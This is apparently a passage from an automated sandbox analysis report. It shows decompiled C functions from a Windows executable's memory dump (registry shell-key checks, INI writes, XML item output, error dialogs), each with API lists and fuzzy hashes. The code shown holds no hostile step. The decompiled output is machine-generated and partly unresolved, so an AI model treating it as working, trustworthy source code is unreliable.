                                                                                                                                                                                                                          											__eflags = 0;
                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                          										goto L18;
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							L18:
                                                                                                                                                                                                                          							CloseHandle(_v16);
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _a8;
                                                                                                                                                                                                                          			}


























                                                                                                                                                                                                                          0x0040934f
                                                                                                                                                                                                                          0x00409358
                                                                                                                                                                                                                          0x0040935e
                                                                                                                                                                                                                          0x0040935e
                                                                                                                                                                                                                          0x00409363
                                                                                                                                                                                                                          0x0040936b
                                                                                                                                                                                                                          0x0040936d
                                                                                                                                                                                                                          0x00409377
                                                                                                                                                                                                                          0x00409385
                                                                                                                                                                                                                          0x0040938d
                                                                                                                                                                                                                          0x0040939d
                                                                                                                                                                                                                          0x004093a5
                                                                                                                                                                                                                          0x004093ac
                                                                                                                                                                                                                          0x004093b4
                                                                                                                                                                                                                          0x004093c5
                                                                                                                                                                                                                          0x004093c9
                                                                                                                                                                                                                          0x004093da
                                                                                                                                                                                                                          0x004093df
                                                                                                                                                                                                                          0x004093e5
                                                                                                                                                                                                                          0x004093e6
                                                                                                                                                                                                                          0x004093ea
                                                                                                                                                                                                                          0x004093f6
                                                                                                                                                                                                                          0x004093fc
                                                                                                                                                                                                                          0x00409407
                                                                                                                                                                                                                          0x00409407
                                                                                                                                                                                                                          0x0040941d
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409423
                                                                                                                                                                                                                          0x00409428
                                                                                                                                                                                                                          0x00409375
                                                                                                                                                                                                                          0x00409375
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040942e
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409428
                                                                                                                                                                                                                          0x00409377
                                                                                                                                                                                                                          0x0040936d
                                                                                                                                                                                                                          0x004094fb
                                                                                                                                                                                                                          0x004094ff
                                                                                                                                                                                                                          0x004094ff
                                                                                                                                                                                                                          0x00409337
                                                                                                                                                                                                                          0x0040931c
                                                                                                                                                                                                                          0x0040950f

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040938D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040939D
                                                                                                                                                                                                                            • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409488
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004094A9
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3300951397-0
                                                                                                                                                                                                                          • Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                                                                                                                          • Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 44%
                                                                                                                                                                                                                          			E00402EC8(void* __ebx) {
                                                                                                                                                                                                                          				struct tagRECT _v20;
                                                                                                                                                                                                                          				struct tagPAINTSTRUCT _v84;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				GetClientRect( *(__ebx + 0x10),  &_v20);
                                                                                                                                                                                                                          				_v20.left = _v20.right - GetSystemMetrics(0x15);
                                                                                                                                                                                                                          				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
                                                                                                                                                                                                                          				asm("movsd");
                                                                                                                                                                                                                          				asm("movsd");
                                                                                                                                                                                                                          				asm("movsd");
                                                                                                                                                                                                                          				asm("movsd");
                                                                                                                                                                                                                          				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
                                                                                                                                                                                                                          				return EndPaint( *(__ebx + 0x10),  &_v84);
                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 19018683-0
                                                                                                                                                                                                                          • Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                                                                                                                          • Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                                                                          			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                          				void _v514;
                                                                                                                                                                                                                          				signed short _v516;
                                                                                                                                                                                                                          				signed short* _t34;
                                                                                                                                                                                                                          				signed int _t37;
                                                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                                                          				signed short* _t44;
                                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t40 = __edi;
                                                                                                                                                                                                                          				E00407343(__edi, _a4, L"<item>\r\n");
                                                                                                                                                                                                                          				_t37 = 0;
                                                                                                                                                                                                                          				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                          						_v516 = _v516 & 0x00000000;
                                                                                                                                                                                                                          						memset( &_v514, 0, 0x1fc);
                                                                                                                                                                                                                          						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
                                                                                                                                                                                                                          						_t44 =  &_v516;
                                                                                                                                                                                                                          						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
                                                                                                                                                                                                                          						_t34 = _t44;
                                                                                                                                                                                                                          						_push(_t34);
                                                                                                                                                                                                                          						_push( *((intOrPtr*)(__edi + 0x64)));
                                                                                                                                                                                                                          						_push(_t34);
                                                                                                                                                                                                                          						_push(L"<%s>%s</%s>\r\n");
                                                                                                                                                                                                                          						_push(0x2000);
                                                                                                                                                                                                                          						_push( *((intOrPtr*)(__edi + 0x68)));
                                                                                                                                                                                                                          						L0040B1EC();
                                                                                                                                                                                                                          						_t46 = _t46 + 0x24;
                                                                                                                                                                                                                          						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
                                                                                                                                                                                                                          						_t37 = _t37 + 1;
                                                                                                                                                                                                                          					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return E00407343(_t40, _a4, L"</item>\r\n");
                                                                                                                                                                                                                          			}











                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004079DB
                                                                                                                                                                                                                            • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
                                                                                                                                                                                                                            • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                                                                                                                            • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00407A25
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                                                          • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                          • API String ID: 1775345501-2769808009
                                                                                                                                                                                                                          • Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                                                                                                                          • Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                                                          			E0040467A(void* __edi) {
                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                          				void _v2062;
                                                                                                                                                                                                                          				short _v2064;
                                                                                                                                                                                                                          				int _t16;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                          				_t16 = E004043F8( &_v12, 0x20019);
                                                                                                                                                                                                                          				if(_t16 == 0) {
                                                                                                                                                                                                                          					_v2064 = _v2064 & _t16;
                                                                                                                                                                                                                          					memset( &_v2062, _t16, 0x7fe);
                                                                                                                                                                                                                          					_push(__edi + 0x20a);
                                                                                                                                                                                                                          					_push(L"%s\\shell\\%s");
                                                                                                                                                                                                                          					_push(0x3ff);
                                                                                                                                                                                                                          					_push( &_v2064);
                                                                                                                                                                                                                          					L0040B1EC();
                                                                                                                                                                                                                          					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
                                                                                                                                                                                                                          						_v8 = 1;
                                                                                                                                                                                                                          						RegCloseKey(_v16);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004046AF
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 004046CD
                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpen_snwprintfmemset
                                                                                                                                                                                                                          • String ID: %s\shell\%s
                                                                                                                                                                                                                          • API String ID: 1458959524-3196117466
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 16%
                                                                                                                                                                                                                          			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
                                                                                                                                                                                                                          				signed short _v131076;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t25 = __esi;
                                                                                                                                                                                                                          				E0040B550(0x20000, __ecx);
                                                                                                                                                                                                                          				if(_a4 == 0) {
                                                                                                                                                                                                                          					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
                                                                                                                                                                                                                          						_push(_a24);
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						_v131076 = _v131076 & 0x00000000;
                                                                                                                                                                                                                          						_push(__esi);
                                                                                                                                                                                                                          						_push(L"\"%s\"");
                                                                                                                                                                                                                          						_push(0xfffe);
                                                                                                                                                                                                                          						_push( &_v131076);
                                                                                                                                                                                                                          						L0040B1EC();
                                                                                                                                                                                                                          						_push(_a24);
                                                                                                                                                                                                                          						_push( &_v131076);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}





                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00409D79
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00409D9E
                                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32 ref: 00409DD4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                                          • String ID: "%s"
                                                                                                                                                                                                                          • API String ID: 1343145685-3297466227
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 38%
                                                                                                                                                                                                                          			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                                                                                                                                          				char _v2052;
                                                                                                                                                                                                                          				short _v4100;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				long _t15;
                                                                                                                                                                                                                          				long _t16;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t15 = __ecx;
                                                                                                                                                                                                                          				E0040B550(0x1000, __ecx);
                                                                                                                                                                                                                          				_t16 = _t15;
                                                                                                                                                                                                                          				if(_t16 == 0) {
                                                                                                                                                                                                                          					_t16 = GetLastError();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				E00404706(_t16,  &_v2052);
                                                                                                                                                                                                                          				_push( &_v2052);
                                                                                                                                                                                                                          				_push(_t16);
                                                                                                                                                                                                                          				_push(L"Error %d: %s");
                                                                                                                                                                                                                          				_push(0x400);
                                                                                                                                                                                                                          				_push( &_v4100);
                                                                                                                                                                                                                          				L0040B1EC();
                                                                                                                                                                                                                          				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00404813
                                                                                                                                                                                                                          • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                                                          • String ID: Error$Error %d: %s
                                                                                                                                                                                                                          • API String ID: 313946961-1552265934
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                          			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                          				void* __ecx;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				signed int _t74;
                                                                                                                                                                                                                          				signed int _t76;
                                                                                                                                                                                                                          				signed short _t85;
                                                                                                                                                                                                                          				signed int _t87;
                                                                                                                                                                                                                          				intOrPtr _t88;
                                                                                                                                                                                                                          				signed short _t93;
                                                                                                                                                                                                                          				void* _t95;
                                                                                                                                                                                                                          				signed int _t124;
                                                                                                                                                                                                                          				signed int _t126;
                                                                                                                                                                                                                          				signed int _t128;
                                                                                                                                                                                                                          				intOrPtr* _t131;
                                                                                                                                                                                                                          				signed int _t135;
                                                                                                                                                                                                                          				signed int _t137;
                                                                                                                                                                                                                          				signed int _t138;
                                                                                                                                                                                                                          				void* _t141;
                                                                                                                                                                                                                          				void* _t142;
                                                                                                                                                                                                                          				void* _t146;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t142 = __eflags;
                                                                                                                                                                                                                          				_push(_t102);
                                                                                                                                                                                                                          				_t131 = __eax;
                                                                                                                                                                                                                          				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
                                                                                                                                                                                                                          				E00406746(__eax);
                                                                                                                                                                                                                          				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
                                                                                                                                                                                                                          				_t135 = 5;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
                                                                                                                                                                                                                          				_t124 = 0x14;
                                                                                                                                                                                                                          				_t74 = _t135 * _t124;
                                                                                                                                                                                                                          				 *(_t131 + 0x2d0) = _t135;
                                                                                                                                                                                                                          				_push( ~(0 | _t142 > 0x00000000) | _t74);
                                                                                                                                                                                                                          				L0040B26C();
                                                                                                                                                                                                                          				 *(_t131 + 0x2d4) = _t74;
                                                                                                                                                                                                                          				_t126 = 0x14;
                                                                                                                                                                                                                          				_t76 = _t135 * _t126;
                                                                                                                                                                                                                          				_push( ~(0 | _t142 > 0x00000000) | _t76);
                                                                                                                                                                                                                          				L0040B26C();
                                                                                                                                                                                                                          				_t95 = 0x40f008;
                                                                                                                                                                                                                          				 *(_t131 + 0x40) = _t76;
                                                                                                                                                                                                                          				_v8 = 0x40f008;
                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                          					_t137 =  *_t95 * 0x14;
                                                                                                                                                                                                                          					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
                                                                                                                                                                                                                          					_t24 = _t95 + 0x14; // 0x40f01c
                                                                                                                                                                                                                          					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
                                                                                                                                                                                                                          					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
                                                                                                                                                                                                                          					_t141 = _t141 + 0x18;
                                                                                                                                                                                                                          					_v12 = _t85;
                                                                                                                                                                                                                          					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
                                                                                                                                                                                                                          					if((_t85 & 0xffff0000) == 0) {
                                                                                                                                                                                                                          						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
                                                                                                                                                                                                                          						_t93 = E00405B81(_v12 | 0x00010000);
                                                                                                                                                                                                                          						_t95 = _v8;
                                                                                                                                                                                                                          						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t95 = _t95 + 0x28;
                                                                                                                                                                                                                          					_t146 = _t95 - 0x40f0d0;
                                                                                                                                                                                                                          					_v8 = _t95;
                                                                                                                                                                                                                          				} while (_t146 < 0);
                                                                                                                                                                                                                          				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
                                                                                                                                                                                                                          				_t138 = 5;
                                                                                                                                                                                                                          				_t128 = 4;
                                                                                                                                                                                                                          				_t87 = _t138 * _t128;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t131 + 0x48)) = 1;
                                                                                                                                                                                                                          				 *(_t131 + 0x2c) = _t138;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
                                                                                                                                                                                                                          				_push( ~(0 | _t146 > 0x00000000) | _t87);
                                                                                                                                                                                                                          				L0040B26C();
                                                                                                                                                                                                                          				_push(0xc);
                                                                                                                                                                                                                          				 *(_t131 + 0x30) = _t87;
                                                                                                                                                                                                                          				L0040B26C();
                                                                                                                                                                                                                          				_t139 = _t87;
                                                                                                                                                                                                                          				if(_t87 == 0) {
                                                                                                                                                                                                                          					_t88 = 0;
                                                                                                                                                                                                                          					__eflags = 0;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t131 + 0x50)) = 0;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
                                                                                                                                                                                                                          				return E0040686C(_t131);
                                                                                                                                                                                                                          			}


























                                                                                                                                                                                                                          0x004069ef
                                                                                                                                                                                                                          0x004069f2
                                                                                                                                                                                                                          0x004069f5
                                                                                                                                                                                                                          0x00406a00
                                                                                                                                                                                                                          0x00406a01
                                                                                                                                                                                                                          0x00406a06
                                                                                                                                                                                                                          0x00406a08
                                                                                                                                                                                                                          0x00406a0b
                                                                                                                                                                                                                          0x00406a10
                                                                                                                                                                                                                          0x00406a16
                                                                                                                                                                                                                          0x00406a25
                                                                                                                                                                                                                          0x00406a25
                                                                                                                                                                                                                          0x00406a18
                                                                                                                                                                                                                          0x00406a1e
                                                                                                                                                                                                                          0x00406a1e
                                                                                                                                                                                                                          0x00406a27
                                                                                                                                                                                                                          0x00406a2f
                                                                                                                                                                                                                          0x00406a32
                                                                                                                                                                                                                          0x00406a35
                                                                                                                                                                                                                          0x00406a3b
                                                                                                                                                                                                                          0x00406a41
                                                                                                                                                                                                                          0x00406a47
                                                                                                                                                                                                                          0x00406a4d
                                                                                                                                                                                                                          0x00406a53
                                                                                                                                                                                                                          0x00406a5d
                                                                                                                                                                                                                          0x00406a6d

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040696D
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040697E
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                                                                                                                                                                            • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                                                                                                                            • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                                                                                                                            • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                                                                                                                            • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                                                                                                                            • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                                                                                                                            • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 975042529-0
                                                                                                                                                                                                                          • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                                                                                                                          • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

